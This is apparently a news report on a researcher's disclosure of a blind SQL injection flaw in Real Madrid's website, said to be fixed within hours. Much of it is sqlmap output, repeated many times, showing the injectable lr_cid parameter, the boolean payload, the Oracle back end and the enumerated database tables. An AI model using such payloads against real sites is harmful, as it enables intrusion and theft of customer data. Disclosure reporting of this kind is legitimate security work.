Greek researcher managed to identify a significant security gap in the official website of Real Madrid, which allowed him to perform SQL injection successfully and gain access to the team database.
On October 10, the Anastasis Vassiliadis identified the vulnerability and informed Real Madrid.
The cooperation was flawless and immediate and the problem was fixed within a few hours.
It is worth noting that the base of the website had over 7.000 tables and many important items such as millions of customer accounts from the official store of the team.
Some vulnerability information:
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
sqlmap resumed the following injection point (s) from stored session:
—
Parameter: lr_cid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: lr_c = RM_Noticia_FA & lr_cid = -8384 OR 8642 = 8642 & lr_language = de & lr_pid = 3 & pagename = RealMadridResponsive / Comunes / Logica / urlCambioIdioma
—
web application technology: JSP
back-end DBMS: Oracle
Database: EXFSYS
[1 table] + ——————————– +
| RLM $ PARSEDCOND |
+ ——————————– +
Database: XDB
[2 tables] + ——————————– +
| XDB $ IMPORT_TT_INFO |
| XDB $ XIDX_IMP_T |
+ ——————————– +
Database: APEX_030200
[3 tables] + ——————————– +
| WWV_FLOW_DUAL100 |
| WWV_FLOW_LOV_TEMP |
| WWV_FLOW_TEMP_TABLE |
+ ——————————– +
Database: SYSTEM
[4 tables] + ——————————– +
| HELP |
| OL $ |
| OL $ HINTS |
| OL $ NODES |
+ ——————————– +
Database: FATWIREDLV
[3437 tables] + ——————————– +
Database: SYS
[26 tables] + ——————————– +
Database: MDSYS
[35 tables] + ——————————– +
Awareness of vulnerabilities discovered in organizations is considered extremely necessary
(especially when they are on high traffic websites), and for us they are an immediate priority.